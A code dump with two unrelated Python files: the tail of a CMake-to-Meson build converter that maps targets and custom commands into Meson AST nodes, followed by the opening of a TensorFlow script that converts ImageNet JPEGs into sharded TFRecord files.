if i.is_generated:
self.generated += i.sources
else:
self.sources += i.sources
def __repr__(self) -> str:
return '<{}: {}>'.format(self.__class__.__name__, self.name)
std_regex = re.compile(r'([-]{1,2}std=|/std:v?|[-]{1,2}std:)(.*)')
def postprocess(self, output_target_map: dict, root_src_dir: str, subdir: str, install_prefix: str, trace: CMakeTraceParser) -> None:
# Detect setting the C and C++ standard
for i in ['c', 'cpp']:
if i not in self.compile_opts:
continue
temp = []
for j in self.compile_opts[i]:
m = ConverterTarget.std_regex.match(j)
if m:
self.override_options += ['{}_std={}'.format(i, m.group(2))]
elif j in ['-fPIC', '-fpic', '-fPIE', '-fpie']:
self.pie = True
elif j in blacklist_compiler_flags:
pass
else:
temp += [j]
self.compile_opts[i] = temp
# Make sure to force enable -fPIC for OBJECT libraries
if self.type.upper() == 'OBJECT_LIBRARY':
self.pie = True
# Use the CMake trace, if required
if self.type.upper() in target_type_requires_trace:
if self.name in trace.targets:
props = trace.targets[self.name].properties
self.includes += props.get('INTERFACE_INCLUDE_DIRECTORIES', [])
self.public_compile_opts += props.get('INTERFACE_COMPILE_DEFINITIONS', [])
self.public_compile_opts += props.get('INTERFACE_COMPILE_OPTIONS', [])
self.link_flags += props.get('INTERFACE_LINK_OPTIONS', [])
else:
mlog.warning('CMake: Target', mlog.bold(self.name), 'not found in CMake trace. This can lead to build errors')
# Fix link libraries
temp = []
for i in self.link_libraries:
# Let meson handle this arcane magic
if ',-rpath,' in i:
continue
if not os.path.isabs(i):
basename = os.path.basename(i)
if basename in output_target_map:
self.link_with += [output_target_map[basename]]
continue
temp += [i]
self.link_libraries = temp
# Filter out files that are not supported by the language
supported = list(header_suffixes) + list(obj_suffixes)
for i in self.languages:
supported += list(lang_suffixes[i])
supported = ['.{}'.format(x) for x in supported]
self.sources = [x for x in self.sources if any([x.endswith(y) for y in supported])]
self.generated = [x for x in self.generated if any([x.endswith(y) for y in supported])]
# Make paths relative
def rel_path(x: str, is_header: bool, is_generated: bool) -> Optional[str]:
if not os.path.isabs(x):
x = os.path.normpath(os.path.join(self.src_dir, x))
if not os.path.exists(x) and not any([x.endswith(y) for y in obj_suffixes]) and not is_generated:
mlog.warning('CMake: path', mlog.bold(x), 'does not exist. Ignoring. This can lead to build errors')
return None
if os.path.isabs(x) and os.path.commonpath([x, self.env.get_build_dir()]) == self.env.get_build_dir():
if is_header:
return os.path.relpath(x, os.path.join(self.env.get_build_dir(), subdir))
else:
return os.path.relpath(x, root_src_dir)
if os.path.isabs(x) and os.path.commonpath([x, root_src_dir]) == root_src_dir:
return os.path.relpath(x, root_src_dir)
return x
def custom_target(x: str):
key = _generated_file_key(x)
if key in output_target_map:
ctgt = output_target_map[key]
assert(isinstance(ctgt, ConverterCustomTarget))
ref = ctgt.get_ref(x)
assert(isinstance(ref, CustomTargetReference) and ref.valid())
return ref
return x
build_dir_rel = os.path.relpath(self.build_dir, os.path.join(self.env.get_build_dir(), subdir))
self.includes = list(set([rel_path(x, True, False) for x in set(self.includes)] + [build_dir_rel]))
self.sources = [rel_path(x, False, False) for x in self.sources]
self.generated = [rel_path(x, False, True) for x in self.generated]
# Resolve custom targets
self.generated = [custom_target(x) for x in self.generated]
# Remove delete entries
self.includes = [x for x in self.includes if x is not None]
self.sources = [x for x in self.sources if x is not None]
self.generated = [x for x in self.generated if x is not None]
# Make sure '.' is always in the include directories
if '.' not in self.includes:
self.includes += ['.']
# make install dir relative to the install prefix
if self.install_dir and os.path.isabs(self.install_dir):
if os.path.commonpath([self.install_dir, install_prefix]) == install_prefix:
self.install_dir = os.path.relpath(self.install_dir, install_prefix)
# Remove blacklisted options and libs
def check_flag(flag: str) -> bool:
if flag.lower() in blacklist_link_flags or flag in blacklist_compiler_flags + blacklist_clang_cl_link_flags:
return False
if flag.startswith('/D'):
return False
return True
self.link_libraries = [x for x in self.link_libraries if x.lower() not in blacklist_link_libs]
self.link_flags = [x for x in self.link_flags if check_flag(x)]
def process_object_libs(self, obj_target_list: List['ConverterTarget']):
# Try to detect the object library(s) from the generated input sources
temp = [x for x in self.generated if isinstance(x, str)]
temp = [os.path.basename(x) for x in temp]
temp = [x for x in temp if any([x.endswith('.' + y) for y in obj_suffixes])]
temp = [os.path.splitext(x)[0] for x in temp]
# Temp now stores the source filenames of the object files
for i in obj_target_list:
source_files = [os.path.basename(x) for x in i.sources + i.generated]
for j in source_files:
if j in temp:
self.object_libs += [i]
break
# Filter out object files from the sources
self.generated = [x for x in self.generated if not isinstance(x, str) or not any([x.endswith('.' + y) for y in obj_suffixes])]
def meson_func(self) -> str:
return target_type_map.get(self.type.upper())
def log(self) -> None:
mlog.log('Target', mlog.bold(self.name))
mlog.log(' -- artifacts: ', mlog.bold(str(self.artifacts)))
mlog.log(' -- full_name: ', mlog.bold(self.full_name))
mlog.log(' -- type: ', mlog.bold(self.type))
mlog.log(' -- install: ', mlog.bold('true' if self.install else 'false'))
mlog.log(' -- install_dir: ', mlog.bold(self.install_dir))
mlog.log(' -- link_libraries: ', mlog.bold(str(self.link_libraries)))
mlog.log(' -- link_with: ', mlog.bold(str(self.link_with)))
mlog.log(' -- object_libs: ', mlog.bold(str(self.object_libs)))
mlog.log(' -- link_flags: ', mlog.bold(str(self.link_flags)))
mlog.log(' -- languages: ', mlog.bold(str(self.languages)))
mlog.log(' -- includes: ', mlog.bold(str(self.includes)))
mlog.log(' -- sources: ', mlog.bold(str(self.sources)))
mlog.log(' -- generated: ', mlog.bold(str(self.generated)))
mlog.log(' -- pie: ', mlog.bold('true' if self.pie else 'false'))
mlog.log(' -- override_opts: ', mlog.bold(str(self.override_options)))
mlog.log(' -- options:')
for key, val in self.compile_opts.items():
mlog.log(' -', key, '=', mlog.bold(str(val)))
class CustomTargetReference:
def __init__(self, ctgt: 'ConverterCustomTarget', index: int):
self.ctgt = ctgt # type: ConverterCustomTarget
self.index = index # type: int
def __repr__(self) -> str:
if self.valid():
return '<{}: {} [{}]>'.format(self.__class__.__name__, self.ctgt.name, self.ctgt.outputs[self.index])
else:
return '<{}: INVALID REFERENCE>'.format(self.__class__.__name__)
def valid(self) -> bool:
return self.ctgt is not None and self.index >= 0
def filename(self) -> str:
return self.ctgt.outputs[self.index]
class ConverterCustomTarget:
tgt_counter = 0 # type: int
def __init__(self, target: CMakeGeneratorTarget):
self.name = 'custom_tgt_{}'.format(ConverterCustomTarget.tgt_counter)
self.original_outputs = list(target.outputs)
self.outputs = [os.path.basename(x) for x in self.original_outputs]
self.command = target.command
self.working_dir = target.working_dir
self.depends_raw = target.depends
self.inputs = []
self.depends = []
ConverterCustomTarget.tgt_counter += 1
def __repr__(self) -> str:
return '<{}: {}>'.format(self.__class__.__name__, self.outputs)
def postprocess(self, output_target_map: dict, root_src_dir: str, subdir: str, build_dir: str) -> None:
# Default the working directory to the CMake build dir. This
# is not 100% correct, since it should be the value of
# ${CMAKE_CURRENT_BINARY_DIR} when add_custom_command is
# called. However, keeping track of this variable is not
# trivial and the current solution should work in most cases.
if not self.working_dir:
self.working_dir = build_dir
# relative paths in the working directory are always relative
# to ${CMAKE_CURRENT_BINARY_DIR} (see note above)
if not os.path.isabs(self.working_dir):
self.working_dir = os.path.normpath(os.path.join(build_dir, self.working_dir))
# Modify the original outputs if they are relative. Again,
# relative paths are relative to ${CMAKE_CURRENT_BINARY_DIR}
# and the first disclaimer is stil in effect
def ensure_absolute(x: str):
if os.path.isabs(x):
return x
else:
return os.path.normpath(os.path.join(build_dir, x))
self.original_outputs = [ensure_absolute(x) for x in self.original_outputs]
# Check if the command is a build target
commands = []
for i in self.command:
assert(isinstance(i, list))
cmd = []
for j in i:
target_key = _target_key(j)
if target_key in output_target_map:
cmd += [output_target_map[target_key]]
else:
cmd += [j]
commands += [cmd]
self.command = commands
# Check dependencies and input files
for i in self.depends_raw:
tgt_key = _target_key(i)
gen_key = _generated_file_key(i)
if os.path.basename(i) in output_target_map:
self.depends += [output_target_map[os.path.basename(i)]]
elif tgt_key in output_target_map:
self.depends += [output_target_map[tgt_key]]
elif gen_key in output_target_map:
self.inputs += [output_target_map[gen_key].get_ref(i)]
elif not os.path.isabs(i) and os.path.exists(os.path.join(root_src_dir, i)):
self.inputs += [i]
elif os.path.isabs(i) and os.path.exists(i) and os.path.commonpath([i, root_src_dir]) == root_src_dir:
self.inputs += [os.path.relpath(i, root_src_dir)]
def get_ref(self, fname: str) -> Optional[CustomTargetReference]:
try:
idx = self.outputs.index(os.path.basename(fname))
return CustomTargetReference(self, idx)
except ValueError:
return None
def log(self) -> None:
mlog.log('Custom Target', mlog.bold(self.name))
mlog.log(' -- command: ', mlog.bold(str(self.command)))
mlog.log(' -- outputs: ', mlog.bold(str(self.outputs)))
mlog.log(' -- working_dir: ', mlog.bold(str(self.working_dir)))
mlog.log(' -- depends_raw: ', mlog.bold(str(self.depends_raw)))
mlog.log(' -- inputs: ', mlog.bold(str(self.inputs)))
mlog.log(' -- depends: ', mlog.bold(str(self.depends)))
class CMakeInterpreter:
def __init__(self, build: 'Build', subdir: str, src_dir: str, install_prefix: str, env: Environment, backend: 'Backend'):
assert(hasattr(backend, 'name'))
self.build = build
self.subdir = subdir
self.src_dir = src_dir
self.build_dir_rel = os.path.join(subdir, '__CMake_build')
self.build_dir = os.path.join(env.get_build_dir(), self.build_dir_rel)
self.install_prefix = install_prefix
self.env = env
self.backend_name = backend.name
self.client = CMakeClient(self.env)
# Raw CMake results
self.bs_files = []
self.codemodel = None
self.raw_trace = None
# Analysed data
self.project_name = ''
self.languages = []
self.targets = []
self.custom_targets = [] # type: List[ConverterCustomTarget]
self.trace = CMakeTraceParser()
# Generated meson data
self.generated_targets = {}
def configure(self, extra_cmake_options: List[str]) -> None:
for_machine = MachineChoice.HOST # TODO make parameter
# Find CMake
cmake_exe = CMakeExecutor(self.env, '>=3.7', for_machine)
if not cmake_exe.found():
raise CMakeException('Unable to find CMake')
generator = backend_generator_map[self.backend_name]
cmake_args = cmake_exe.get_command()
# Map meson compiler to CMake variables
for lang, comp in self.env.coredata.compilers[for_machine].items():
if lang not in language_map:
continue
cmake_lang = language_map[lang]
exelist = comp.get_exelist()
if len(exelist) == 1:
cmake_args += ['-DCMAKE_{}_COMPILER={}'.format(cmake_lang, exelist[0])]
elif len(exelist) == 2:
cmake_args += ['-DCMAKE_{}_COMPILER_LAUNCHER={}'.format(cmake_lang, exelist[0]),
'-DCMAKE_{}_COMPILER={}'.format(cmake_lang, exelist[1])]
if hasattr(comp, 'get_linker_exelist') and comp.get_id() == 'clang-cl':
cmake_args += ['-DCMAKE_LINKER={}'.format(comp.get_linker_exelist()[0])]
cmake_args += ['-G', generator]
cmake_args += ['-DCMAKE_INSTALL_PREFIX={}'.format(self.install_prefix)]
cmake_args += ['--trace', '--trace-expand']
cmake_args += extra_cmake_options
# Run CMake
mlog.log()
with mlog.nested():
mlog.log('Configuring the build directory with', mlog.bold('CMake'), 'version', mlog.cyan(cmake_exe.version()))
mlog.log(mlog.bold('Running:'), ' '.join(cmake_args))
mlog.log()
os.makedirs(self.build_dir, exist_ok=True)
os_env = os.environ.copy()
os_env['LC_ALL'] = 'C'
proc = Popen(cmake_args + [self.src_dir], stdout=PIPE, stderr=PIPE, cwd=self.build_dir, env=os_env)
def print_stdout():
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode('utf-8').strip('\n'))
proc.stdout.close()
t = Thread(target=print_stdout)
t.start()
self.raw_trace = proc.stderr.read()
self.raw_trace = self.raw_trace.decode('utf-8')
proc.stderr.close()
proc.wait()
t.join()
mlog.log()
h = mlog.green('SUCCEEDED') if proc.returncode == 0 else mlog.red('FAILED')
mlog.log('CMake configuration:', h)
if proc.returncode != 0:
raise CMakeException('Failed to configure the CMake subproject')
def initialise(self, extra_cmake_options: List[str]) -> None:
# Run configure the old way becuse doing it
# with the server doesn't work for some reason
self.configure(extra_cmake_options)
with self.client.connect():
generator = backend_generator_map[self.backend_name]
self.client.do_handshake(self.src_dir, self.build_dir, generator, 1)
# Do a second configure to initialise the server
self.client.query_checked(RequestConfigure(), 'CMake server configure')
# Generate the build system files
self.client.query_checked(RequestCompute(), 'Generating build system files')
# Get CMake build system files
bs_reply = self.client.query_checked(RequestCMakeInputs(), 'Querying build system files')
# Now get the CMake code model
cm_reply = self.client.query_checked(RequestCodeModel(), 'Querying the CMake code model')
src_dir = bs_reply.src_dir
self.bs_files = [x.file for x in bs_reply.build_files if not x.is_cmake and not x.is_temp]
self.bs_files = [os.path.relpath(os.path.join(src_dir, x), self.env.get_source_dir()) for x in self.bs_files]
self.bs_files = list(set(self.bs_files))
self.codemodel = cm_reply
def analyse(self) -> None:
if self.codemodel is None:
raise CMakeException('CMakeInterpreter was not initialized')
# Clear analyser data
self.project_name = ''
self.languages = []
self.targets = []
self.custom_targets = []
self.trace = CMakeTraceParser(permissive=True)
# Parse the trace
self.trace.parse(self.raw_trace)
# Find all targets
for i in self.codemodel.configs:
for j in i.projects:
if not self.project_name:
self.project_name = j.name
for k in j.targets:
if k.type not in skip_targets:
self.targets += [ConverterTarget(k, self.env)]
for i in self.trace.custom_targets:
self.custom_targets += [ConverterCustomTarget(i)]
# generate the output_target_map
output_target_map = {}
for i in self.targets:
output_target_map[i.full_name] = i
output_target_map[_target_key(i.name)] = i
ttarget = self.trace.targets.get(i.name)
soversion = ttarget.properties.get('SOVERSION') if ttarget else None
if soversion:
k = '{}.{}'.format(i.full_name, soversion[0])
output_target_map[k] = i
for j in i.artifacts:
output_target_map[os.path.basename(j)] = i
for i in self.custom_targets:
for j in i.original_outputs:
output_target_map[_generated_file_key(j)] = i
object_libs = []
# First pass: Basic target cleanup
for i in self.custom_targets:
i.postprocess(output_target_map, self.src_dir, self.subdir, self.build_dir)
for i in self.targets:
i.postprocess(output_target_map, self.src_dir, self.subdir, self.install_prefix, self.trace)
if i.type == 'OBJECT_LIBRARY':
object_libs += [i]
self.languages += [x for x in i.languages if x not in self.languages]
# Second pass: Detect object library dependencies
for i in self.targets:
i.process_object_libs(object_libs)
mlog.log('CMake project', mlog.bold(self.project_name), 'has', mlog.bold(str(len(self.targets) + len(self.custom_targets))), 'build targets.')
def pretend_to_be_meson(self) -> CodeBlockNode:
if not self.project_name:
raise CMakeException('CMakeInterpreter was not analysed')
def token(tid: str = 'string', val='') -> Token:
return Token(tid, self.subdir, 0, 0, 0, None, val)
def string(value: str) -> StringNode:
return StringNode(token(val=value))
def id_node(value: str) -> IdNode:
return IdNode(token(val=value))
def number(value: int) -> NumberNode:
return NumberNode(token(val=value))
def nodeify(value):
if isinstance(value, str):
return string(value)
elif isinstance(value, bool):
return BooleanNode(token(), value)
elif isinstance(value, int):
return number(value)
elif isinstance(value, list):
return array(value)
return value
def indexed(node: BaseNode, index: int) -> IndexNode:
return IndexNode(node, nodeify(index))
def array(elements) -> ArrayNode:
args = ArgumentNode(token())
if not isinstance(elements, list):
elements = [args]
args.arguments += [nodeify(x) for x in elements]
return ArrayNode(args, 0, 0, 0, 0)
def function(name: str, args=None, kwargs=None) -> FunctionNode:
if args is None:
args = []
if kwargs is None:
kwargs = {}
args_n = ArgumentNode(token())
if not isinstance(args, list):
args = [args]
args_n.arguments = [nodeify(x) for x in args]
args_n.kwargs = {k: nodeify(v) for k, v in kwargs.items()}
func_n = FunctionNode(self.subdir, 0, 0, 0, 0, name, args_n)
return func_n
def method(obj: BaseNode, name: str, args=None, kwargs=None) -> MethodNode:
if args is None:
args = []
if kwargs is None:
kwargs = {}
args_n = ArgumentNode(token())
if not isinstance(args, list):
args = [args]
args_n.arguments = [nodeify(x) for x in args]
args_n.kwargs = {k: nodeify(v) for k, v in kwargs.items()}
return MethodNode(self.subdir, 0, 0, obj, name, args_n)
def assign(var_name: str, value: BaseNode) -> AssignmentNode:
return AssignmentNode(self.subdir, 0, 0, var_name, value)
# Generate the root code block and the project function call
root_cb = CodeBlockNode(token())
root_cb.lines += [function('project', [self.project_name] + self.languages)]
# Add the run script for custom commands
run_script = '{}/data/run_ctgt.py'.format(os.path.dirname(os.path.realpath(__file__)))
run_script_var = 'ctgt_run_script'
root_cb.lines += [assign(run_script_var, function('find_program', [[run_script]], {'required': True}))]
# Add the targets
processed = {}
def resolve_ctgt_ref(ref: CustomTargetReference) -> BaseNode:
tgt_var = processed[ref.ctgt.name]['tgt']
if len(ref.ctgt.outputs) == 1:
return id_node(tgt_var)
else:
return indexed(id_node(tgt_var), ref.index)
def process_target(tgt: ConverterTarget):
# First handle inter target dependencies
link_with = []
objec_libs = []
sources = []
generated = []
generated_filenames = []
custom_targets = []
for i in tgt.link_with:
assert(isinstance(i, ConverterTarget))
if i.name not in processed:
process_target(i)
link_with += [id_node(processed[i.name]['tgt'])]
for i in tgt.object_libs:
assert(isinstance(i, ConverterTarget))
if i.name not in processed:
process_target(i)
objec_libs += [processed[i.name]['tgt']]
# Generate the source list and handle generated sources
for i in tgt.sources + tgt.generated:
if isinstance(i, CustomTargetReference):
if i.ctgt.name not in processed:
process_custom_target(i.ctgt)
generated += [resolve_ctgt_ref(i)]
generated_filenames += [i.filename()]
if i.ctgt not in custom_targets:
custom_targets += [i.ctgt]
else:
sources += [i]
# Add all header files from all used custom targets. This
# ensures that all custom targets are built before any
# sources of the current target are compiled and thus all
# header files are present. This step is necessary because
# CMake always ensures that a custom target is executed
# before another target if at least one output is used.
for i in custom_targets:
for j in i.outputs:
if not is_header(j) or j in generated_filenames:
continue
generated += [resolve_ctgt_ref(i.get_ref(j))]
generated_filenames += [j]
# Determine the meson function to use for the build target
tgt_func = tgt.meson_func()
if not tgt_func:
raise CMakeException('Unknown target type "{}"'.format(tgt.type))
# Determine the variable names
base_name = str(tgt.name)
base_name = base_name.replace('-', '_')
inc_var = '{}_inc'.format(base_name)
src_var = '{}_src'.format(base_name)
dep_var = '{}_dep'.format(base_name)
tgt_var = base_name
# Generate target kwargs
tgt_kwargs = {
'link_args': tgt.link_flags + tgt.link_libraries,
'link_with': link_with,
'include_directories': id_node(inc_var),
'install': tgt.install,
'install_dir': tgt.install_dir,
'override_options': tgt.override_options,
'objects': [method(id_node(x), 'extract_all_objects') for x in objec_libs],
}
# Handle compiler args
for key, val in tgt.compile_opts.items():
tgt_kwargs['{}_args'.format(key)] = val
# Handle -fPCI, etc
if tgt_func == 'executable':
tgt_kwargs['pie'] = tgt.pie
elif tgt_func == 'static_library':
tgt_kwargs['pic'] = tgt.pie
# declare_dependency kwargs
dep_kwargs = {
'link_args': tgt.link_flags + tgt.link_libraries,
'link_with': id_node(tgt_var),
'compile_args': tgt.public_compile_opts,
'include_directories': id_node(inc_var),
}
# Generate the function nodes
inc_node = assign(inc_var, function('include_directories', tgt.includes))
node_list = [inc_node]
if tgt_func == 'header_only':
del dep_kwargs['link_with']
dep_node = assign(dep_var, function('declare_dependency', kwargs=dep_kwargs))
node_list += [dep_node]
src_var = ''
tgt_var = ''
else:
src_node = assign(src_var, function('files', sources))
tgt_node = assign(tgt_var, function(tgt_func, [base_name, [id_node(src_var)] + generated], tgt_kwargs))
node_list += [src_node, tgt_node]
if tgt_func in ['static_library', 'shared_library']:
dep_node = assign(dep_var, function('declare_dependency', kwargs=dep_kwargs))
node_list += [dep_node]
else:
dep_var = ''
# Add the nodes to the ast
root_cb.lines += node_list
processed[tgt.name] = {'inc': inc_var, 'src': src_var, 'dep': dep_var, 'tgt': tgt_var, 'func': tgt_func}
def process_custom_target(tgt: ConverterCustomTarget) -> None:
# CMake allows to specify multiple commands in a custom target.
# To map this to meson, a helper script is used to execute all
# commands in order. This addtionally allows setting the working
# directory.
tgt_var = tgt.name # type: str
def resolve_source(x: Any) -> Any:
if isinstance(x, ConverterTarget):
if x.name not in processed:
process_target(x)
return id_node(x.name)
elif isinstance(x, CustomTargetReference):
if x.ctgt.name not in processed:
process_custom_target(x.ctgt)
return resolve_ctgt_ref(x)
else:
return x
# Generate the command list
command = []
command += [id_node(run_script_var)]
command += ['-o', '@OUTPUT@']
command += ['-O'] + tgt.original_outputs
command += ['-d', tgt.working_dir]
# Generate the commands. Subcommands are seperated by ';;;'
for cmd in tgt.command:
command += [resolve_source(x) for x in cmd] + [';;;']
tgt_kwargs = {
'input': [resolve_source(x) for x in tgt.inputs],
'output': tgt.outputs,
'command': command,
'depends': [resolve_source(x) for x in tgt.depends],
}
root_cb.lines += [assign(tgt_var, function('custom_target', [tgt.name], tgt_kwargs))]
processed[tgt.name] = {'inc': None, 'src': None, 'dep': None, 'tgt': tgt_var, 'func': 'custom_target'}
# Now generate the target function calls
for i in self.custom_targets:
if i.name not in processed:
process_custom_target(i)
for i in self.targets:
if i.name not in processed:
process_target(i)
self.generated_targets = processed
return root_cb
def target_info(self, target: str) -> Optional[Dict[str, str]]:
if target in self.generated_targets:
return self.generated_targets[target]
return None
def target_list(self) -> List[str]:
return list(self.generated_targets.keys())
|
build_imagenet_data.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = b'RGB'
channels = 3
image_format = b'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset.encode()),
'image/class/text': _bytes_feature(human.encode()),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename).encode()),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg, feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb, feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg, feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
